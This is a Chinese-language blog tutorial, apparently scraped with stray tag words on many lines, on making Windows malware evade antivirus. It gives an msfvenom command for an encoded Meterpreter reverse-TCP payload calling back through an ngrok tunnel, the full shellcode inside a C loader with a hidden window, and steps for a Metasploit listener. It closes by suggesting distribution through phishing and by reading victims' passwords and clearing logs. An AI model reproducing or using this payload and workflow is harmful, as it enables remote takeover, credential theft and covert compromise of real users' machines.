本篇文章适用学习,维护网络安全,作合法公民linux
介绍:以前使用 小七免杀工具包 来做免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。git
现在开源的东西比起手工来作,不只免杀率高,速度快,功能多,并且会长期维护。下面我就介绍下 Hercules 工具:github
须要安装虚拟机,运行下载的.iso(若是不用Kali,BT5也能够,Kali是BT系列的升级版)。sql
解压到 /usr/local
目录下:shell
让GO命令有效:windows
文件后追加 export PATH=$PATH:/usr/local/go/bin
:安全
再按 Esc
,保存退出。查看是否正确配置:服务器
升级软件包:网络
选择(1),输入ip、端口号(用于反弹回连),以后依次输入y及要生成的文件名,很简单就不截图了。框架
文件生成后,在 在线查毒网站 检测下,显示不少杀毒软件都检测不到。
Kali Linux 上访问 ngrok网站(使用花生壳作内网穿透也能够),注册登录,而后点击隧道管理进入:
点击确认添加,这样隧道就建立完成:
进入Kali,下载运行 ngrok客户端 地址:https://www.ngrok.cc/#down-cl...,下载linux的版本
成功运行ngrok客户端后,内网穿透就弄好了,外网地址就是下图中的 server.nogrok.cc: 注册隧道的端口号
使用MetaSpolit Framework简称Msf框架。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cc lport=00000 -f c
-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀概率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)
若是-f指定的是c,则将输出的buf[]复制出来:
这个就不贴图了,直接贴代码了
#include <stdio.h> #pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"") // 运行时不显示窗口 unsigned char buf[] = "\xbb\xa1\x7d\x04\x59\xda\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1" "\x9e\x31\x5d\x14\x03\x5d\x14\x83\xed\xfc\x43\x88\xba\x1e\xde" "\x61\xa6\x7a\x33\x5c\x5c\x5f\x47\x07\xae\x56\x16\x2f\x53\xa8" "\x5c\x61\x24\x38\x5f\xf1\xd5\xd8\xed\x77\x1f\xc2\xb5\x4f\x0b" "\x05\xb8\x9c\x44\xf1\x31\x77\xdc\x47\x2f\xaf\xa7\xf5\x50\xa9" "\xa3\x45\xb7\x52\x62\x52\x8e\xb9\x03\x5e\xcd\x1f\xb8\xec\xa8" "\x64\x3e\x96\x16\x0d\x3e\x5d\x30\x53\xa7\xcf\xf0\xd0\xaa\x32" "\xe5\x6b\x12\x74\x50\xcb\xdd\x12\x89\xde\x29\x03\xca\xcb\xb8" "\x2c\xd8\xdf\x42\xf8\xa2\x42\xdd\xdc\x31\xe8\x15\xe9\x40\x87" "\x3c\x4b\xf7\x79\x30\x7b\x33\xee\xcc\x46\xa6\x17\x39\x57\xec" "\xf0\xcc\x6d\xe3\x17\xf5\xe8\x5c\xc4\xd4\xbb\x26\x8c\xc0\x0e" "\xe3\xab\xc6\xad\x84\x0d\x25\x9c\x37\x30\xd0\x3c\x81\x9e\x29" "\x8b\xb5\xec\xd2\xbf\x01\xf0\xc6\x0d\xde\xa8\x9b\xe5\x72\x88" "\x00\x21\xd8\xac\x78\xb4\xe7\x70\x05\xda\xe3\xa9\xaf\xcf\x2c" "\x04\x6a\xe7\x0d\x2c\xc3\xce\x3a\x48\x0f\x94\xac\xb9\xb8\xcb" "\xa6\xdf\xed\xf8\x1d\x75\x4e\x16\x78\xb6\xe8\x0c\x07\x48\x84" "\xce\x79\xd4\xa0\x68\x8f\xc5\xd4\xde\x31\x13\x27\x4e\xa7\xaf" "\x51\x54\x8a\x12\x1a\xb7\x8a\x97\x60\x10\x48\x01\x6c\x39\x46" "\x40\x07\x8d\xe1\x19\xf4\x65\x25\x87\xd5\x27\x8b\x11\x7f\xcb" "\xd2\x30\x0f\x91\x2f\x30\x55\x1d\x7d\xef\xb0\x03\x98\x59\x0e" "\x29\xc5\xbd\x6c\x8b\xe1\x84\x8f\xee\xc9\x22\xe9\x62\xf1\x06" "\x19\xf1\xbe\xa5\x8c\x88\xed\xc2\x71\x70\x01\x59\x4c\x15\x5a" "\xe4\xe8\x75\x3c\xdc\x96\xd5\x41\x70\xe3\x60\x7d\x45\x29\x56" "\xd2\xf4\x73\xb5\x06\xc7\xba\x53\x22\xdd\xbd\x5d\x89\x91\xe6" "\x72\xfc\x75\x37\xbc\xed\xbb\x16\x05\x01\x56\x3a\x32\x72\x69" "\x93\xec\xa4\x7b\x33\xff\xd7\x92\x7d\x1c\xef\xd7\x75\x7d\x45" "\x5f\x67\x47\x2b\x90\x9b\x6e\x82\xb4\x17\xcd\x3b\x45\x8b\x4d" "\x45\x50\x71\xeb\xb9\x49\x42\x64\xd7\x0c\x67\x61\xee\x21\x6e" "\x78\x7e\x32\x26\xe7\x65\x10\x9d\x69\x46\x21\x2f\x97\x3c\x3d" "\xbe\xd7\x06\x2f\x5b\x81\xae\xe9\x22\x6d\xdc\x6d\x2f\x64\xfb" "\xc1\xe1\xae\xf6\xc6\x0a\x73\x52\x10\x7c\xb0\x3f\xf2\x60\x69" "\xaf\x05\x6a\xa6\x2a\x53\xec\xb8\x73\xdd\xd3\x2c\x82\xab\x64" "\x97\xf3\xdb\xe8\x2f\x22\x50\xde\xf4\x2e\x97\x8a\x79\xf4\xdc" "\x92\x37\x45\x23\x86\x63\x42\x5e\x98\xc2\x49\xc3\x1d\x34\x1d" "\xac\x24\x76\xef\xd7\x69\x8d\xd2\x2c\x40\x1c\xa2\x36\x29\x6c" "\xa5\x25\x01\xd7\xbd\x7c\x15\x54\x07\xaa\x2c\x5a\xeb\x53\x6d" "\x3b\x3a\x45\x50\x6d\x4f\x96\xb3\xf9\xdb\x96\x29\x0d\x6a\xa9" "\x58\x9f\xf0\x14\xc3\x79\x0c\x99\x3c\x58\xc0\x61\xb6\xca\x5d" "\x61\x9f\xf9\x65\x99\xb4\x91\xac\x5d\x7c\xf5\x9c\x99\xe5\x60" "\x99\xc9\x8d\xcb\xe7\xd4\xc3\x5c\xd6\x39\xd4\xe0\x71\x73\xa2" "\x24\xdd\x3c\xb4\x82\xda\x2c\xaf\xa5\x1e\x48\xa7\xf5\x89\x4d" "\xb6\x10\x74\xe5\x06\xf2\x5b\xfa\x3c\x58\x84\xc6\x68\x16\x8b" "\x26\x7a\x2f\x2a\x0c\x40\xf8\x61\x8b\x49\x14\x27\xf7\xe5\x4f" "\x9a\xe3\x47\xb7\x1a\x13\xe9\x16\x06\x84\xab\x70"; main() { ((void(*)(void))&buf)(); }
编译.cpp,生成.exe。
接下来咱们还要配置Msf反向端口监听。
Msf前先运行psql(新版Msf加入了psql的支持):
配置Msf利用:
这时咱们就大功告成了,只需等待客户端运行咱们的.exe(钓鱼挂马群发等方式散播)
运行.exe,Msf显示已经回连,以后的操做就跟windows同样了,读取对方密码、目录、清log等等。。。
通过运行,360、腾讯杀毒软件没有检测出来问题。。。